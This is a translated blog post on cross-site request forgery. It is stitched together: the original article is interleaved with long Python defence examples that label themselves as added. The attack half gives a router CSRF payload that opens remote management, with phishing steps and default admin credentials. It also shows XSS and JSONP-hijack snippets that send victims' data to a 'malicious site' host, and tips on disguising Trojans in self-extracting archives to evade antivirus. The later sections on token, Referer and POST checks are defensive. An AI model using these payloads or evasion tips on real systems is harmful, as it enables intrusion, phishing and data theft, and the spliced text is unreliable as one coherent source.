CSRF (cross-site request forgery) attacks: CSRF phishing to add an administrator account, and security precautions

CSRF Phishing adds administrator account and security precautions

Local network device CSRF attack

Normally, internal network devices such as switches and routers are not reachable from the external network. So how can an internal network device be reached? Note that many internal network devices still use their default passwords.
First, log in to the router as a normal user and open the web management port; then use Burp to capture the packet and obtain the request address:

    <img src="http://192.168.1.1/userRpm/ManageControlRpm.htm?port=80&ip=255.255.255.255&Save=%B1%A3+%B4%E6">

Insert this attack code into a page of your choosing and trick the other party's company into visiting that address. Once it has been loaded, the remote web management port of the other party's device is open.
The attack code does three things: it enables the web management port (port=80), sets the permitted remote address to 255.255.255.255 (that is, any address), and saves the configuration.
Note that when a logged-in user visits a web page carrying the CSRF attack code, the "remote WEB management" function is "forcibly" enabled.
The CSRF attack is launched with a GET request; social engineering and similar methods are used to get the victim to load the CSRF file on the malicious site.
The default username and password for WEB management on FAST wireless broadband routers are both admin.

CSRF without a browser

Embed the attack code into the self-extracting options of an archive.
When working on antivirus evasion, this function can also be used to turn a self-extracting archive into a Trojan that evades antivirus software.
A Trojan can be split into parts: first split off the registry part, then the memory part, then the boot and import parts, and finally add an automatically started .exe.

Adding an administrator account with Burp

When the website is open source, find the code that adds an administrator account, replay the request that creates an administrator, and modify it: change the address to the target website, embed the request in a malicious program, and trick the administrator into triggering it while logged into the management backend.

Summary

The bar for a CSRF attack is not very high, but this kind of attack must be based on the session: the victim has to execute the malicious code while logged in. This requires combining CSRF with other attack methods, that is, constructing the attack code and then getting it executed through phishing.

CSRF worm model

There are almost no restrictions on the data a CSRF attack can obtain within the same domain.

Several methods for obtaining data with cross-domain CSRF attacks are summarized below.

1. XSS

Use an XSS vulnerability on the target site:

    <iframe width=0 height=0 src='http://目标站点/search.php?k="><script src=http://恶意站点/get.js></script>'></iframe>

The code of http://恶意站点/get.js (恶意站点 = the malicious site) is:

    // use DOM methods to collect the data you want
    new Image().src = 'http://恶意站点/do.php?data=' + yourdata;

The do.php file on the malicious site receives data such as a unique identifier. The unique identifier may appear in the URL itself or in the content the target site returns for that URL.

2. Server-side proxy technique

3. JSON Hijacking

Use the JSON Hijacking technique:

The target site uses JSON data to transfer the user's private data.
The private data contains information such as the unique identifier we need.

    <script>
    function hijack(o) {
        // use DOM methods to collect the data you want; o is the JSON object
        // passed to the callback by the target site's JSONP endpoint
        new Image().src = "http://192.168.1.2/JSONHiJack.asp?hi=" + escape(o);
    }
    </script>
    <script src=http://api.fanfou.com/private_messages/inbox.json?callback=hijack&count=2></script>

4. Flash ActionScript (crossdomain.xml)

Use Flash ActionScript scripts. A crossdomain.xml file must exist on the target site, and its configuration must allow AS scripts from other domains to make cross-domain requests.
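The cross-domain policy described above is a configuration problem, so the defender's check is to audit the crossdomain.xml the site actually serves. The following Python is an added example (not code from the original post): it parses a constructed permissive policy beside a constructed restricted one and reports the entries that open the site to arbitrary domains. The two policy documents, the host name static.bank.test and the function names are assumptions made for the example.

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed example: the weak policy, which lets Flash content from any
# origin make credentialed cross-domain requests to this site.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed example: the corrected policy, which names one trusted host,
# requires HTTPS for it, and refuses policy files elsewhere on the site.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.bank.test" secure="true"/>
</cross-domain-policy>"""


def permissive_entries(policy_xml: str) -> List[str]:
    """Return the policy entries that a reviewer should flag as too broad.

    Flagged: a wildcard domain ("*" or "*.example"), an entry that allows
    plain-HTTP callers (secure="false"), and wildcard request-header grants.
    An empty list means no entry widens access beyond named, HTTPS-only hosts.
    """
    root = ET.fromstring(policy_xml)
    findings = []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*" or domain.startswith("*."):
            findings.append(f"allow-access-from domain={domain}")
        elif el.get("secure", "true").lower() == "false":
            findings.append(f"allow-access-from domain={domain} secure=false")
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append("allow-http-request-headers-from domain=*")
    return findings


def is_open_to_any_domain(policy_xml: str) -> bool:
    """True when the policy grants cross-domain access to an unrestricted set of origins."""
    return any(f.startswith("allow-access-from domain=*") for f in permissive_entries(policy_xml))


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(name, permissive_entries(policy))
```

In practice the same audit is run against the policy fetched from the site's own /crossdomain.xml; a policy that names only the hosts that genuinely need Flash access, with secure="true", is what removes this data-collection route.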

The key data to be obtained is a unique identifier: user id, user nickname, user email, the address of the user's personal page, and so on.

CSRF vulnerability prevention

Server defense

Verify the HTTP Referer field

According to the HTTP protocol, the HTTP header contains a field called Referer, which records the source address of the HTTP request. Under normal circumstances, a request for a security-restricted page must come from the same website.

For example, a bank transfer is completed when the user accesses the page http://bank.test/test?page=10&userID=101&money=10000. The user must first log in to bank.test and then trigger the transfer event by clicking the button on the page.
When the user submits the request, the Referer of the transfer request will be the URL of the page where the transfer button is located (in this case, usually an address under the bank.test domain name).

If an attacker wants to carry out a CSRF attack on the bank's website, he can only construct the request on his own website. When the user sends a request to the bank through the attacker's website, the Referer of the request points to the attacker's website. Therefore, to defend against CSRF attacks, the bank website only needs to verify the Referer value of every transfer request: if the domain name is bank.test, the request comes from the bank's own website and is legitimate; if the Referer is another website, it may be a CSRF attack, and the request is rejected.
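The Referer check is only as good as the comparison behind it, so here is an added Python example (not code from the original post) of the bank.test check done two ways: the literal "starts with bank.test" string test, kept only for contrast, and a parsed-host check that prefers the Origin header, compares the host name exactly and fails closed when both headers are missing. The host names bank.test and attacker.example and the header dictionaries are constructed for the example.

```python
from typing import Mapping, Optional
from urllib.parse import urlsplit

# Hosts allowed to originate state-changing requests (constructed example:
# the bank site from the text above).
TRUSTED_HOSTS = {"bank.test"}


def naive_prefix_check(referer: str) -> bool:
    """The literal 'Referer starts with bank.test' rule, kept for contrast.

    A string-prefix test is not a host test: 'bank.test.attacker.example' and
    'bank.test@attacker.example' both begin with the trusted name.
    """
    return referer.startswith(("http://bank.test", "https://bank.test"))


def source_host(headers: Mapping[str, str]) -> Optional[str]:
    """Return the host named by Origin (preferred) or Referer, or None if neither is usable."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        # Browsers send the literal string "null" as Origin for opaque origins;
        # treat it like a missing header rather than as a host.
        if not value or value.strip().lower() == "null":
            continue
        parts = urlsplit(value.strip())
        if parts.scheme in ("http", "https") and parts.hostname:
            # .hostname drops any user:password@ prefix and port and lowercases.
            return parts.hostname.lower()
    return None


def is_trusted_source(headers: Mapping[str, str]) -> bool:
    """Accept the request only if the parsed source host is exactly a trusted host.

    A missing or stripped header fails closed: for a transfer-style action the
    server cannot tell a privacy-stripped Referer from a forged request, so it
    should refuse rather than guess.
    """
    host = source_host(headers)
    return host is not None and host in TRUSTED_HOSTS


if __name__ == "__main__":
    for hdrs in ({"Referer": "http://bank.test/transfer"},
                 {"Referer": "http://bank.test.attacker.example/page.html"},
                 {"Referer": "http://bank.test@attacker.example/"},
                 {}):
        print(hdrs, "->", is_trusted_source(hdrs))
```

Because some proxies and browser privacy settings remove Referer entirely, this check is usually treated as a supplementary layer; the token check described next is the primary control.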

Add token to request address and verify

CSRF attacks succeed because the attacker can forge the user's request, and all of the user's authentication information in that request lives in the cookie. The attacker can therefore pass the security check by letting the browser attach the user's own cookie, without ever knowing the authentication information.

It follows that the key to resisting CSRF is to put information into the request that the attacker cannot forge and that does not live in the cookie. The developer can add a randomly generated token to the HTTP request as a parameter and add an interceptor on the server that verifies the token. If the request carries no token, or the token is wrong, it may be a CSRF attack and the request is rejected.

Customize attributes in the HTTP header and verify

The custom-attribute method also uses a token and verifies it. The difference from the previous method is that the token is not placed in the HTTP request as a parameter but in a custom attribute of the HTTP header.
Through the XMLHttpRequest class, the csrftoken HTTP header attribute can be added to all requests of this kind at once, with the token value placed in it. This removes the inconvenience of adding the token to every request in the previous method. At the same time, addresses requested through this class are not recorded in the browser's address bar, so there is no need to worry about the token leaking to other websites through the Referer.

Strictly distinguish between POST and GET data requests in the server area

For example, in ASP do not use Request to fetch data directly. It is also recommended not to use GET requests to perform persistent operations, for example: http://www.yeeyan.com/space/deleteEvent/16824.
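The three server-side measures just described (a per-session token passed as a parameter, the same token passed in a custom header, and refusing to perform persistent operations over GET or from a merged request collection) fit naturally into one check. The following Python is an added example, not code from the original post: the token is derived with HMAC from the session id, it is accepted from the X-CSRF-Token header or the POST body but never from the query string, and any non-POST method is rejected before the token is even read. The header name, the form field name csrftoken, the session ids and the server secret are assumptions for the example.

```python
import hashlib
import hmac
import secrets
from typing import Mapping, Optional, Tuple

# Server-side key for deriving tokens (constructed: a real deployment loads it
# from configuration so it survives restarts and is shared across workers).
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(session_id: str) -> str:
    """Derive the per-session token as HMAC-SHA256(secret, session id).

    The token is embedded in the page (hidden form field or a JS variable the
    XMLHttpRequest code copies into the header), never set as a cookie, so a
    forged cross-site request cannot carry it automatically.
    """
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def token_from_request(headers: Mapping[str, str], form: Mapping[str, str]) -> Optional[str]:
    """Read the token from the custom header or the POST body only.

    The query string is deliberately not consulted: a token in the URL leaks
    through Referer and history, and reading a merged query+form collection
    (the ASP Request pitfall mentioned above) would let a GET satisfy a check
    meant for POST.
    """
    return headers.get("X-CSRF-Token") or form.get("csrftoken")


def verify_state_changing_request(method: str, session_id: str,
                                  headers: Mapping[str, str],
                                  form: Mapping[str, str],
                                  query: Mapping[str, str]) -> Tuple[bool, str]:
    """Gate a persistent operation (transfer, delete, add admin) behind method and token checks.

    `query` is accepted only to make explicit that it is never used for the token.
    """
    if method.upper() != "POST":
        return False, "state-changing action must use POST"
    presented = token_from_request(headers, form)
    if presented is None:
        return False, "missing CSRF token"
    expected = issue_token(session_id)
    # Constant-time comparison so the check does not leak the token byte by byte.
    if not hmac.compare_digest(presented, expected):
        return False, "CSRF token mismatch"
    return True, "ok"


if __name__ == "__main__":
    sid = "session-123"
    tok = issue_token(sid)
    print(verify_state_changing_request("POST", sid, {"X-CSRF-Token": tok}, {}, {}))
    print(verify_state_changing_request("GET", sid, {}, {}, {"csrftoken": tok}))
```

Binding the token to the session id means a token stolen from one session is useless in another, and deriving it with HMAC avoids storing a token per session on the server; the interceptor only needs the secret and the session id it already has.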

Confirm with verification code or password

This method is very effective, but the user experience is worse.
For example, to change a password, the user must enter a verification code or the original password.

User defense

It is unrealistic to expect ordinary users to learn network security in order to defend themselves against network attacks. But if users develop good online habits, the harm of CSRF attacks can be greatly reduced.
The system administrator, as the most important user, should avoid clicking unknown links and pictures while logged into the system. In addition, users should install appropriate security software on any computer connected to the Internet and update the vendor's signature database promptly, so that the security software keeps up with the latest attacks.

Defense of security equipment

It takes time to go from the discovery of a vulnerability to the release of a patch, a considerable proportion of manufacturers do not respond actively to vulnerabilities, and some system administrators do not pay enough attention to patching. In view of this, users can deploy third-party professional security equipment to strengthen their defense against CSRF vulnerabilities.

The essence of a CSRF attack is that the attacker forges a legitimate identity to gain access to the system. If the visitor's forged identity can be recognized, the CSRF attack can be recognized too. Research has found that some vendors' security products can inspect the Referer field of the HTTP header at the hardware level to identify CSRF attacks quickly and accurately. At present, H3C's IPS products use dedicated techniques to detect and block CSRF attacks against some commonly used systems. The first method is to match network traffic against the signatures in the signature database:

If the traffic hits a signature, an attack log is reported.

If the traffic hits no signature, it is released.



Origin blog.csdn.net/weixin_43079958/article/details/105458267